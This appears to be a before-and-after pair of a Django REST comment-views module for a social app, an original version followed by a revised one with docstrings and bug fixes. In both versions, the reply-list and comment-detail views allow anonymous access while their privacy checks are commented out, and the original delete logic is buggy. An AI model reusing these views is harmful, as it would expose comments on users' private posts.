parent_comment = self._get_url_comment(**kwargs)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
created_comment = serializer.save(
commenter=request.user,
parent_buzz=parent_comment.parent_buzz,
parent_rebuzz=parent_comment.parent_rebuzz,
parent_comment=parent_comment.id,
level=parent_comment.level + 1,
**serializer.validated_data,
)
parent_comment.comment_interaction.replies.append(created_comment.id)
parent_comment.comment_interaction.save()
# create notification
create_notification(
ACTION_TYPE["RPLY"],
CONTENT_TYPE["CMNT"],
request.user,
parent_comment,
created_comment,
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Created",
f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not create comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## UPDATE
# ##################################
class EditCommentView(APIView):
serializer_class = EditCommentSerializer
permission_classes = [
IsAuthenticated,
IsCommentOwner,
]
required_fields = ["content"]
field_options = ["content", "flair"]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# elif comment_instance.parent_rebuzz:
# if comment_instance.parent_rebuzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private ReBuzz",
# code="User has made their rebuzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def patch(self, request, *args, **kwargs):
""" """
try:
data = request.data
comment_to_update = self._get_url_comment(**kwargs)
RequestFieldsChecker().check_fields(
data, self.field_options, self.required_fields
)
self.check_object_permissions(request, comment_to_update)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
serializer.update_comment(
comment_to_update, edited=True, **serializer.validated_data
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Updated",
f"Comment has been updated. `id:{comment_to_update.id}`",
),
status=status.HTTP_200_OK,
)
except (ExtraFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not edit comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## DELETE
# ##################################
class DeleteCommentView(APIView):
serializer_class = EditCommentSerializer
permission_classes = [
IsAuthenticated,
IsCommentOwner,
]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def _delete_interactions(self, comment_to_delete, comment_id):
"""Delete parent interactions"""
buzz_instance = comment_to_delete.parent_buzz
rebuzz_instance = comment_to_delete.parent_rebuzz
comment_instance = comment_to_delete.parent_comment
if buzz_instance:
buzz_instance.buzz_interaction.comments.remove(comment_id)
buzz_instance.save()
if rebuzz_instance:
rebuzz_instance.rebuzz_interaction.comments.remove(comment_id)
rebuzz_instance.save()
if comment_instance:
comment_instance.commenr_interaction.comment.remove(comment_id)
comment_instance.save()
def delete(self, request, *args, **kwargs):
""" """
try:
comment_to_delete = self._get_url_comment(**kwargs)
self.check_object_permissions(request, comment_to_delete)
comment_id = comment_to_delete.id
comment_to_delete.delete()
self._delete_interactions(comment_to_delete, comment_id)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Deleted",
f"Comment has been deleted. `id:{comment_to_delete.id}`",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not delete comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
| from django.db.models import Q
from rest_framework import status
from rest_framework.exceptions import NotAuthenticated, PermissionDenied
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from bumblebee.buzzes.utils import (
get_buzz_from_buzzid_or_raise,
get_rebuzz_from_rebuzzid_or_raise,
)
from bumblebee.comments.utils import (
get_comment_from_commentid_or_raise,
get_comments_from_commentid_list,
)
from bumblebee.core.exceptions import (
ExtraFieldsError,
MissingFieldsError,
NoneExistenceError,
UrlParameterError,
)
from bumblebee.core.helpers import (
RequestFieldsChecker,
create_200,
create_400,
create_500,
)
from bumblebee.core.permissions import IsCommentOwner
from bumblebee.notifications.choices import ACTION_TYPE, CONTENT_TYPE
from bumblebee.notifications.utils import create_notification, delete_notification
from ..serializers.comment_serializers import (
CommentDetailSerializer,
CreateCommentSerializer,
EditCommentSerializer,
)
##################################
## RETRIEVE
##################################
class BuzzOrRebuzzCommentListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def _get_comments(self, *args, **kwargs):
""" """
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
buzz_instance = self._get_url_buzz(url_buzzid)
return buzz_instance.buzz_comment.filter(level=1)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
return rebuzz_instance.rebuzz_comment.filter(level=1)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_comments()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get('username')}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentReplyListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_comment(self, url_commentid):
""" """
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private ReBuzz",
# code="User has made their rebuzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def _get_replies(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = self._get_url_comment(url_commentid)
replyid_list = comment_instance.comment_interaction.replies
if len(replyid_list) != 0:
replies = get_comments_from_commentid_list(replyid_list)
objects = replies["comments"].filter(level=comment_instance.level + 1)
return objects
else:
return None
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_replies()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get('username')}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentDetailView(APIView):
""" """
permission_classes = [AllowAny]
def _get_url_comment(self, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instance = self._get_url_comment(**kwargs)
serializer = CommentDetailSerializer(comment_instance)
return Response(
serializer.data,
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get details for comment `id: {kwargs.get('commentid')}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## CREATE
# ##################################
class CreateCommentView(APIView):
""" """
serializer_class = CreateCommentSerializer
permission_classes = [IsAuthenticated]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if buzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Buzz",
code="User has made their buzz private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if rebuzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Rebuzz",
code="User has made their rebuzz private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def post(self, request, *args, **kwargs):
""" """
try:
data = request.data
# check either image or content
RequestFieldsChecker().check_at_least_one_field_or_raise(
data, ["content", "images"]
)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
buzz_instance = self._get_url_buzz(url_buzzid)
created_comment = serializer.save(
commenter=request.user,
parent_buzz=buzz_instance,
level=1,
**serializer.validated_data,
)
interaction = buzz_instance.buzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["BUZZ"],
request.user,
buzz_instance,
created_comment,
)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
created_comment = serializer.save(
commenter=request.user,
parent_rebuzz=rebuzz_instance,
**serializer.validated_data,
)
interaction = rebuzz_instance.rebuzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["RBZ"],
request.user,
rebuzz_instance,
created_comment,
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Created",
f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not create comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CreateCommentReplyView(APIView):
    """Create a reply to an existing comment.

    The parent comment id comes from the URL (``commentid``). The reply
    inherits the parent's buzz/rebuzz reference and is nested one level
    deeper than its parent.
    """

    serializer_class = CreateCommentSerializer
    permission_classes = [IsAuthenticated]

    def _get_url_comment(self, *args, **kwargs):
        """Resolve ``commentid`` from the URL to a comment instance.

        Raises:
            PermissionDenied: when the parent buzz/rebuzz or its author's
                profile is private.
            UrlParameterError: when the URL lacks ``commentid``.
        """
        url_commentid = self.kwargs.get("commentid", False)
        if url_commentid:
            comment_instance = get_comment_from_commentid_or_raise(
                commentid=url_commentid
            )
            if comment_instance.parent_buzz:
                if comment_instance.parent_buzz.author.profile.private:
                    raise PermissionDenied(
                        detail="Private Profile",
                        code="User has made their profile private.",
                    )
                if comment_instance.parent_buzz.privacy == "priv":
                    raise PermissionDenied(
                        detail="Private Buzz",
                        code="User has made their buzz private.",
                    )
            elif comment_instance.parent_rebuzz:
                if comment_instance.parent_rebuzz.author.profile.private:
                    raise PermissionDenied(
                        detail="Private Profile",
                        code="User has made their profile private.",
                    )
                if comment_instance.parent_rebuzz.privacy == "priv":
                    raise PermissionDenied(
                        detail="Private Rebuzz",
                        code="User has made their rebuzz private.",
                    )
            return comment_instance
        else:
            raise UrlParameterError(
                "commentid",
                create_400(
                    400,
                    "Url Error",
                    "Url must contain `comment id`",
                ),
            )

    def post(self, request, *args, **kwargs):
        """Create the reply, link it to the parent comment and notify."""
        try:
            data = request.data
            # The reply must carry at least one of these payload fields.
            RequestFieldsChecker().check_at_least_one_field_or_raise(
                data, ["content", "images"]
            )
            parent_comment = self._get_url_comment(**kwargs)
            serializer = self.serializer_class(data=data)
            serializer.is_valid(raise_exception=True)
            created_comment = serializer.save(
                commenter=request.user,
                parent_buzz=parent_comment.parent_buzz,
                parent_rebuzz=parent_comment.parent_rebuzz,
                parent_comment=parent_comment.id,
                level=parent_comment.level + 1,
                **serializer.validated_data,
            )
            # record the reply on the parent comment's interaction row
            parent_comment.comment_interaction.replies.append(created_comment.id)
            parent_comment.comment_interaction.save()
            # notify the parent comment's author about the reply
            create_notification(
                ACTION_TYPE["RPLY"],
                CONTENT_TYPE["CMNT"],
                request.user,
                parent_comment,
                created_comment,
            )
            return Response(
                create_200(
                    status.HTTP_200_OK,
                    "Comment Created",
                    f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
                ),
                status=status.HTTP_200_OK,
            )
        except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
            return Response(error.message, status=error.message.get("status"))
        except (PermissionDenied, NotAuthenticated) as error:
            return Response(
                create_400(
                    error.status_code,
                    error.get_codes(),
                    error.get_full_details().get("message"),
                ),
                status=error.status_code,
            )
        except Exception as error:
            return Response(
                create_500(
                    # guard: error.args may be empty, indexing would raise
                    cause=error.args[0] if error.args else None,
                    verbose="Could not create comment due to an unknown error",
                ),
                status=status.HTTP_500_INTERNAL_SERVER_ERROR,
            )
# ##################################
# ## UPDATE
# ##################################
class EditCommentView(APIView):
    """Update a comment owned by the requesting user (PATCH).

    ``content`` is required; ``flair`` is the only other accepted field.
    Privacy of the parent buzz/rebuzz is intentionally not checked here:
    the owner may edit their own comment regardless.
    """

    serializer_class = EditCommentSerializer
    permission_classes = [
        IsAuthenticated,
        IsCommentOwner,
    ]
    # fields the PATCH body must / may contain
    required_fields = ["content"]
    field_options = ["content", "flair"]

    def _get_url_comment(self, *args, **kwargs):
        """Resolve ``commentid`` from the URL or raise UrlParameterError."""
        url_commentid = self.kwargs.get("commentid", False)
        if url_commentid:
            return get_comment_from_commentid_or_raise(commentid=url_commentid)
        raise UrlParameterError(
            "commentid",
            create_400(
                400,
                "Url Error",
                "Url must contain `comment id`",
            ),
        )

    def patch(self, request, *args, **kwargs):
        """Validate the payload, check ownership and apply the update."""
        try:
            data = request.data
            comment_to_update = self._get_url_comment(**kwargs)
            # reject unknown fields / enforce required ones
            RequestFieldsChecker().check_fields(
                data, self.field_options, self.required_fields
            )
            self.check_object_permissions(request, comment_to_update)
            serializer = self.serializer_class(data=data)
            serializer.is_valid(raise_exception=True)
            # mark the comment as edited alongside the field changes
            serializer.update_comment(
                comment_to_update, edited=True, **serializer.validated_data
            )
            return Response(
                create_200(
                    status.HTTP_200_OK,
                    "Comment Updated",
                    f"Comment has been updated. `id:{comment_to_update.id}`",
                ),
                status=status.HTTP_200_OK,
            )
        except (ExtraFieldsError, UrlParameterError, NoneExistenceError) as error:
            return Response(error.message, status=error.message.get("status"))
        except (PermissionDenied, NotAuthenticated) as error:
            return Response(
                create_400(
                    error.status_code,
                    error.get_codes(),
                    error.get_full_details().get("message"),
                ),
                status=error.status_code,
            )
        except Exception as error:
            return Response(
                create_500(
                    # guard: error.args may be empty, indexing would raise
                    cause=error.args[0] if error.args else None,
                    verbose="Could not edit comment due to an unknown error",
                ),
                status=status.HTTP_500_INTERNAL_SERVER_ERROR,
            )
# ##################################
# ## DELETE
# ##################################
class DeleteCommentView(APIView):
    """Delete a comment owned by the requesting user."""

    serializer_class = EditCommentSerializer
    permission_classes = [
        IsAuthenticated,
        IsCommentOwner,
    ]

    def _get_url_comment(self, *args, **kwargs):
        """Resolve ``commentid`` from the URL or raise UrlParameterError."""
        url_commentid = self.kwargs.get("commentid", False)
        if url_commentid:
            return get_comment_from_commentid_or_raise(commentid=url_commentid)
        raise UrlParameterError(
            "commentid",
            create_400(
                400,
                "Url Error",
                "Url must contain `comment id`",
            ),
        )

    def _delete_interactions(self, comment_to_delete, comment_id):
        """Remove ``comment_id`` from the parent's interaction lists.

        Mirrors the create views, which append to ``interaction.comments``
        (buzz/rebuzz) or ``comment_interaction.replies`` (replies) and save
        the *interaction* row.
        """
        buzz_instance = comment_to_delete.parent_buzz
        rebuzz_instance = comment_to_delete.parent_rebuzz
        parent_comment = comment_to_delete.parent_comment
        if buzz_instance:
            interaction = buzz_instance.buzz_interaction
            interaction.comments.remove(comment_id)
            # BUG FIX: previously saved the buzz itself, so the removal
            # from the interaction row was never persisted.
            interaction.save()
        if rebuzz_instance:
            interaction = rebuzz_instance.rebuzz_interaction
            interaction.comments.remove(comment_id)
            # BUG FIX: save the interaction, not the rebuzz (see above).
            interaction.save()
        if parent_comment:
            # BUG FIX: was `commenr_interaction.comment` — a typo and the
            # wrong list; replies live in `comment_interaction.replies`
            # (see CreateCommentReplyView.post).
            # NOTE(review): the create path stores `parent_comment` as an
            # id, not an instance — confirm this attribute resolves to a
            # comment object before relying on this branch.
            interaction = parent_comment.comment_interaction
            interaction.replies.remove(comment_id)
            interaction.save()

    def delete(self, request, *args, **kwargs):
        """Detach the comment from its parents, then delete it."""
        try:
            comment_to_delete = self._get_url_comment(**kwargs)
            self.check_object_permissions(request, comment_to_delete)
            comment_id = comment_to_delete.id
            # BUG FIX: detach from parents BEFORE deleting — Django clears
            # the instance pk on delete(), and the old order also reported
            # `id:None` in the success message below.
            self._delete_interactions(comment_to_delete, comment_id)
            comment_to_delete.delete()
            return Response(
                create_200(
                    status.HTTP_200_OK,
                    "Comment Deleted",
                    f"Comment has been deleted. `id:{comment_id}`",
                ),
                status=status.HTTP_200_OK,
            )
        except (UrlParameterError, NoneExistenceError) as error:
            return Response(error.message, status=error.message.get("status"))
        except (PermissionDenied, NotAuthenticated) as error:
            return Response(
                create_400(
                    error.status_code,
                    error.get_codes(),
                    error.get_full_details().get("message"),
                ),
                status=error.status_code,
            )
        except Exception as error:
            return Response(
                create_500(
                    # guard: error.args may be empty, indexing would raise
                    cause=error.args[0] if error.args else None,
                    verbose="Could not delete comment due to an unknown error",
                ),
                status=status.HTTP_500_INTERNAL_SERVER_ERROR,
            )
# NOTE(review): stray non-Python text (web-page residue) — commented out so
# the module remains parseable; remove entirely once confirmed unintentional.
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.